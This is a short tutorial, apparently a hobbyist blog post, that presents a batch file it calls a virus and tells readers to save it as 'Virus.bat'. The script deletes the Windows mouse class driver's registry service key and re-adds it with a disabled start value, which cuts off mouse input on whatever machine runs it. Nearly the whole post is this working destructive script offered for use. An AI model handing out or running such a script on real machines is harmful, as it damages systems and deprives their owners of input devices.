Make A Virus Through Batch Programming.
I Had Previously Posted On Making Different Batch Files Like Matrix Effect, Opening No Of Websites With One Click Which Were Interesting And Completely Harmless.
But Today We Will Be Making A Batch Virus Which Is Harmfull It Will Disable Your Mouse So Think Before Trying It On Yourself.
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
Save It As A Bat File .
Ex: Virus.bat Or Whatever U Want .
And That's It Your Virus Is Created.